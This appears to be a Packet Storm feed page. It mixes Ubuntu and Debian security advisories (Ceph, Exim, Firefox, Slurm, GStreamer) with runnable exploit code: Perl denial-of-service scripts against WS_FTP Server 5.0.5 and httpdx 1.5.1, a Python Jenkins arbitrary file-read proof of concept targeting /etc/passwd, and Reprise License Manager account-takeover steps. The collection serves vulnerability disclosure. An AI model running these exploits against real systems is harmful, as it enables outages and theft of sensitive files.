Ubuntu Security Notice 6613-1 - Lucas Henry discovered that Ceph incorrectly handled specially crafted POST requests. An unprivileged user could use this to bypass Ceph's authorization checks and upload a file to any bucket.

==========================================================================  
Ubuntu Security Notice USN-6613-1  
January 29, 2024

ceph vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Ceph could be made to bypass authorization checks if it received a  
specially crafted request.

Software Description:  
- ceph: distributed storage and file system

Details:

Lucas Henry discovered that Ceph incorrectly handled specially  
crafted POST requests. An uprivileged user could use this to  
bypass Ceph's authorization checks and upload a file to any bucket.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   ceph                            18.2.0-0ubuntu3.1  
   ceph-base                       18.2.0-0ubuntu3.1  
   ceph-common                     18.2.0-0ubuntu3.1

Ubuntu 22.04 LTS:  
   ceph                            17.2.6-0ubuntu0.22.04.3  
   ceph-base                       17.2.6-0ubuntu0.22.04.3  
   ceph-common                     17.2.6-0ubuntu0.22.04.3

Ubuntu 20.04 LTS:  
   ceph                            15.2.17-0ubuntu0.20.04.6  
   ceph-base                       15.2.17-0ubuntu0.20.04.6  
   ceph-common                     15.2.17-0ubuntu0.20.04.6

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   ceph                            12.2.13-0ubuntu0.18.04.11+esm1  
   ceph-base                       12.2.13-0ubuntu0.18.04.11+esm1  
   ceph-common                     12.2.13-0ubuntu0.18.04.11+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   ceph                            10.2.11-0ubuntu0.16.04.3+esm1  
   ceph-common                     10.2.11-0ubuntu0.16.04.3+esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   ceph                            0.80.11-0ubuntu1.14.04.4+esm2  
   ceph-common                     0.80.11-0ubuntu1.14.04.4+esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6613-1  
   CVE-2023-43040

Package Information:  
   https://launchpad.net/ubuntu/+source/ceph/18.2.0-0ubuntu3.1  
   https://launchpad.net/ubuntu/+source/ceph/17.2.6-0ubuntu0.22.04.3  
   https://launchpad.net/ubuntu/+source/ceph/15.2.17-0ubuntu0.20.04.6

Ubuntu Security Notice USN-6613-1

WS_FTP Server version 5.0.5 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: WS_FTP Server 5.0.5 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 30 january 2024  
# Vendor Homepage:  N/A  
# Notification vendor: No reported  
# Tested Version: 5.0.5  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)

#1. Description about vunerability and exploited

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit we intentionally increased the number of bytes sent to the server to process.  
#We concluded that the FTP server does not correctly manage the amount of data or bytes sent and processed, causing denied service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

    my $exploit = "\x41"x676;  
    $exploit .=  "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e";  
    $exploit .=  "\x42"x3000;  
    $exploit .=  "\r\n";

        my $sock = IO::Socket::INET->new(  
        PeerAddr => $target->$ip,  
        PeerPort => $target->$port,  
        Proto    => 'tcp',  
    ) or die "Not connect to $ip:$port: $!";

    my $response = <$sock>;  
    print "Connected => $response";

      $sock->send("USER $ftp_user\r\n");  
      $response = <$sock>;  
      print "Authentication USER: $response";

      $sock->send("PASS $ftp_pass\r\n");  
      $response = <$sock>;  
      print "Authentication PASSWORD: $response";

        $sock->send("MKD ".$exploit);  
        $response = <$sock>;  
        print "Exploited : $response";

sub intro {  
      print q {

      ---------- # ------------------------------------------------------------------  
      --------- ##= ------- [+] WS_FTP Server 5.0.5 - Denied of Service (DoS) -------  
      -------- ##=== ----------------------------------------------------------------  
      ------ ###==#=== --------------------------------------------------------------  
      ---- ####===##==== ------------------------------------------------------------  
      -- #####====###===== -----          Coded by Fernando Mengali             -----  
      - #####=====####===== -----        fernando.mengalli@gmail.com            -----  
      - #####=====####===== ---------------------------------------------------------  
      --- ####=  #  #==== --------    Prepare to exploiting the server   ------------  
      --------- ##= -----------------------------------------------------------------  
      ------- ####=== ---------------------------------------------------------------

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

WS_FTP Server 5.0.5 Denial Of Service

httpdx version 1.5.1 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: httpdx 1.5.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 30 january 2024  
# Vendor Homepage:  http://httpdx.sourceforge.net  
# Download to demo: https://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.1/  
# Notification vendor: No reported  
# Tested Version: httpdx 1.5.1 - Denial of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=EFtRwGVzx4s

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The web server does not correctly handle the amount of data or bytes sent.  
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

   my $sock = IO::Socket::INET->new("$ip:$port");

   my $exploit = "\x41"x1040;

   print $sock "POST /index2.html HTTP/1.0\r\n" .   
    "Content-Length: 1023\r\n" .   
    "Content-Type: html\r\n" .   
    "Host: $ip" . "\r\n" .  
    "\r\n" .  
    $exploit;

                print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

      ---------- # ------------------------------------------------------------------  
      --------- ##= -------------- [+] httpdx 1.5.1 - Denial of Service (DoS) -------  
      -------- ##=== ----------------------------------------------------------------  
      ------ ###==#=== --------------------------------------------------------------  
      ---- ####===##==== ------------------------------------------------------------  
      -- #####====###===== -----          Coded by Fernando Mengali             -----  
      - #####=====####===== -----        fernando.mengalli@gmail.com            -----  
      - #####=====####===== ---------------------------------------------------------  
      --- ####=  #  #==== --------    Prepare to exploiting the server   ------------  
      --------- ##= -----------------------------------------------------------------  
      ------- ####=== ---------------------------------------------------------------

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

httpdx 1.5.1 Denial Of Service

Sysdig Falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about Falco as a mix between snort, ossec and strace.

Falco 0.37.0

Debian Linux Security Advisory 5609-1 - Several vulnerabilities were discovered in the Slurm Workload Manager, a cluster resource management and job scheduling system, which may result in privilege escalation, denial of service, bypass of message hash checks or opening files with an incorrect set of extended groups.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5609-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJanuary 28, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : slurm-wlmCVE ID         : CVE-2023-49933 CVE-2023-49936 CVE-2023-49937 CVE-2023-49938Debian Bug     : 1058720Several vulnerabilities were discovered in the Slurm Workload Manager, acluster resource management and job scheduling system, which may resultin privilege escalation, denial of service, bypass of message hashchecks or opening files with an incorrect set of extended groups.For the stable distribution (bookworm), these problems have been fixedin version 22.05.8-4+deb12u2.We recommend that you upgrade your slurm-wlm packages.For the detailed security status of slurm-wlm please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/slurm-wlmFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW2Sj9fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Q/0xAAiIX2hFquenx281NrzLcnOeIiuvf/+2eXs4/yVQ2P91S7kTzdbRc9n1dVAIwcvQHKHlQH7z/GHVLtjLDwjiAc34OcPzvLipiFgg6JRmKweOMWqyRns9DaIy4vRZRg7RvS4ltDOuqP9UXScTom4GAM3GCF6wrvxsyNwSvwayaJtqQw09OjWHJsKOPeaKJ6yIBfXUukreUQUctVH5P3HG58S1WD/8EqYrpgxC0mBYxs2Iv2FkEcyyiWY2mthuOqkmzfxf25xzQqlDg7kPMikHkqsHmKiFViAWOe44o0C7jED1JOh72BZk93ktrBWaA0lqj9w+CUhPoUinOL76qn+ija8URNIlnPExmY8/BlBDwEZ9pawTo/wv/IS34GzPDrpQQsBTRPpfO9FrJYPf87Ryfp7OpkWfa6LLqTckDp0PQc05/ABdKVtBw/OtfHZud9/qO+M80045IP4QIzDOiYkAQPEbnS3qlT6Io8RYu4C1tNiALBksMnuim3E63dKbRN4lBzCujKY0clKPLtafE6uNXv9gpQRdq2irDGo+IY8A2rfziWqrmdmiP5bxyQsZNpTuNSVGa5s+skId17xZDH/uQBi6UTT/0Qz8mceqa1Ufzu2bbpNHVdgGZ+YbAjAT7bOr5AY1JHqdCDXx6Pl2vQhIss20R3bxi8O0oZODPquGWgkwA==fdxl-----END PGP SIGNATURE-----

Debian Security Advisory 5609-1

Ubuntu Security Notice 6610-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Cornel Ionce discovered that Firefox did not properly manage memory when opening the print preview dialog. An attacker could potentially exploit this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6610-1January 29, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-0741,CVE-2024-0742, CVE-2024-0743, CVE-2024-0744, CVE-2024-0745, CVE-2024-0747,CVE-2024-0748, CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,CVE-2024-0754, CVE-2024-0755)Cornel Ionce discovered that Firefox did not properly manage memory whenopening the print preview dialog. An attacker could potentially exploitthis issue to cause a denial of service. (CVE-2024-0746)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         122.0+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6610-1  CVE-2024-0741, CVE-2024-0742, CVE-2024-0743, CVE-2024-0744,  CVE-2024-0745, CVE-2024-0746, CVE-2024-0747, CVE-2024-0748,  CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,  CVE-2024-0754, CVE-2024-0755Package Information:  https://launchpad.net/ubuntu/+source/firefox/122.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6610-1

Debian Linux Security Advisory 5608-1 - A heap-based buffer overflow during tile list parsing was discovered in the AV1 video codec parser for the GStreamer media framework, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5608-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJanuary 27, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gst-plugins-bad1.0CVE ID         : CVE-2024-0444A heap-based buffer overflow during tile list parsing was discovered inthe AV1 video codec parser for the GStreamer media framework, which mayresult in denial of service or potentially the execution of arbitrarycode if a malformed media file is opened.For the oldstable distribution (bullseye), this problem has been fixedin version 1.18.4-3+deb11u4.For the stable distribution (bookworm), this problem has been fixed inversion 1.22.0-4+deb12u5.We recommend that you upgrade your gst-plugins-bad1.0 packages.For the detailed security status of gst-plugins-bad1.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gst-plugins-bad1.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW1XvtfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T6lQ//U5/FcuUV+SLF3IYzbSGP3nxOl3njQNMQz12woGd8SJdFpsEgeyOFUqwE1u6xUjNbryI3N/U3zGxEH3P5gZdcxXbQX3dWqHr6IrBC1ciBwKZrtmcmy9ME2OZd1r2QYGNxGYr2d/E9IV6lvT6L2MPeKTbEmAUjCGgY/nsPi9P2ECwufD7KEHh+6IXn5WRPEFIWioOXWhiBn02x612VHJUvux5geBz6oLkl9sc2V9coHx19kywaC9W2JMttSlyBaw3s7l2lv25rwTYCie1YmAgjsvnyZu3ijGMwHp/Sa7RYUkTC09S/fzuZlFOADz5HRslsjvlk0SomPg5A0J6eDYVQUqE3fq3A2zRtkDbeGbScAmc4eyR1d4LE0FqTPOUxZoCR84fP542vOqLimvfdnkkaPSJwcQJRrwKx4r/hYFwOi4W1gwy90at7MQljzwrfExMcXu9B3WmzmwAcTsX9nrgyiXNKH3Lib0gT+93TbqdhUNHuj9zC885JfOwxTh+jRaas4dyx4Tjaz83pJaUzEEIgAHByfr5N1UltvIUmO7AX9C9iLLyVVmgb2Qz0ujdc1N8XSqcvB52psJe5o6oEx6UbAVTH48PGrCuYY2kfzKKHYUan6n8MILRw8Is4FaUz4BAUd6Fjgo+jG/oS32grK7aujTbqRCiDaTDLcT/vywZldQA==giTa-----END PGP SIGNATURE-----

Debian Security Advisory 5608-1

Ubuntu Security Notice 6611-1 - It was discovered that Exim incorrectly handled certain requests. A remote attacker could possibly use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism.

==========================================================================  
Ubuntu Security Notice USN-6611-1  
January 29, 2024

exim4 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Exim could be made to bypass an SPF protection mechanism if it received  
a specially crafted request.

Software Description:  
- exim4: Exim is a mail transport agent

Details:

It was discovered that Exim incorrectly handled certain requests.  
A remote attacker could possibly use a published exploitation technique  
to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass  
of an SPF protection mechanism.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  exim4                           4.96-17ubuntu2.2  
  exim4-base                      4.96-17ubuntu2.2  
  eximon4                         4.96-17ubuntu2.2

Ubuntu 22.04 LTS:  
  exim4                           4.95-4ubuntu2.5  
  exim4-base                      4.95-4ubuntu2.5  
  eximon4                         4.95-4ubuntu2.5

Ubuntu 20.04 LTS:  
  exim4                           4.93-13ubuntu1.10  
  exim4-base                      4.93-13ubuntu1.10  
  eximon4                         4.93-13ubuntu1.10

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  exim4                           4.90.1-1ubuntu1.10+esm3  
  exim4-base                      4.90.1-1ubuntu1.10+esm3  
  eximon4                         4.90.1-1ubuntu1.10+esm3

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  exim4                           4.86.2-2ubuntu2.6+esm6  
  exim4-base                      4.86.2-2ubuntu2.6+esm6  
  eximon4                         4.86.2-2ubuntu2.6+esm6

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6611-1  
  CVE-2023-51766

Package Information:  
  https://launchpad.net/ubuntu/+source/exim4/4.96-17ubuntu2.2  
  https://launchpad.net/ubuntu/+source/exim4/4.95-4ubuntu2.5  
  https://launchpad.net/ubuntu/+source/exim4/4.93-13ubuntu1.10

Ubuntu Security Notice USN-6611-1

Reprise License Manager version 15.1 suffers from privilege escalation and arbitrary file write vulnerabilities.

    Multiple Vulnerabilities in Reprise License Manager 15.1 (CVE-2023-43183, CVE-2023-44031)Credit: Mohaiman Rahim/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 15.1# Vendor:   Reprise Software# CVE ID:   CVE-2023-43183# Vulnerability Title: Incorrect Access Control (leading to PrivEsc)# Severity:  High# Author(s): Mohaiman Rahim# Date:     2024-01-14##############################################################Introduction:Reprise License Manager 15.1 is affected by an incorrect access control vulnerability which allows low level users, such as read-only users, to arbitrarily change the password of an admin and hijack their account.Vulnerability PoC:This vulnerability can be demonstrated by modifying the "user" POST parameter at http://HOST:5054/change_password_process with the username of a target user (such as an Admin account).When executed this will result in the password of the targeted user being changed and the account therefore being compromised.////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 15.1# Vendor:   Reprise Software# CVE ID:   CVE-2023-44031# Vulnerability Title: Incorrect Access Control (leading to arbitrary file write)# Severity:  High# Author(s): Mohaiman Rahim# Date:     2024-01-14##############################################################Introduction:Reprise License Manager 15.1 is affected by an incorrect access control vulnerability which allows a user to perform privileged web application functions, such as a function that generates system information.This vulnerability can be exploited to be able to change the path of where the diagnostics file should be saved via a crafted HTTP POST request.This can allow an attacker to save the diagnostics file, containing system information, in insecure locations.Vulnerability PoC:This vulnerability can be demonstrated by modifying the "outputfile" POST parameter at http://HOST:5054/diagnostics_doit to an insecure path accessible by local users such as "C:\temp".Deloitte Disclaimer: Deloitte refers to a Deloitte member firm, one of its related entities, or Deloitte Touche Tohmatsu Limited ("DTTL"). Each Deloitte member firm is a separate legal entity and a member of DTTL. DTTL does not provide services to clients. Please see www.deloitte.com/about to learn more. Deloitte Statsautoriseret Revisionspartnerselskab, CVR-nr. 33 96 35 56 This message (including any attachments) contains confidential information intended for a specific individual and purpose, and is protected by law. If you are not the intended recipient, you should delete this message and are hereby notified that any disclosure, copying, or distribution of this message, or the taking of any action based on it, is strictly prohibited.

Reprise License Manager 15.1 Privilege Escalation / File Write

Jenkins versions 2.441 and below and LTS 2.426.3 and below remote arbitrary file read proof of concept exploit written in Python.

    # python poc.py# [*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]import threadingimport http.clientimport timeimport uuidimport urllib.parseimport sysif len(sys.argv) != 3:    print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')    exit()data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'target = urllib.parse.urlparse(sys.argv[1])uuid_str = str(uuid.uuid4())print(f'REQ: {data_bytes}\n')def req1():    conn = http.client.HTTPConnection(target.netloc)    conn.request("POST", "/cli?remoting=false", headers={        "Session": uuid_str,        "Side": "download"    })    print(f'RESPONSE: {conn.getresponse().read()}')def req2():    conn = http.client.HTTPConnection(target.netloc)    conn.request("POST", "/cli?remoting=false", headers={        "Session": uuid_str,        "Side": "upload",        "Content-type": "application/octet-stream"    }, body=data_bytes)t1 = threading.Thread(target=req1)t2 = threading.Thread(target=req2)t1.start()time.sleep(0.1)t2.start()t1.join()t2.join()

Source

Packet Storm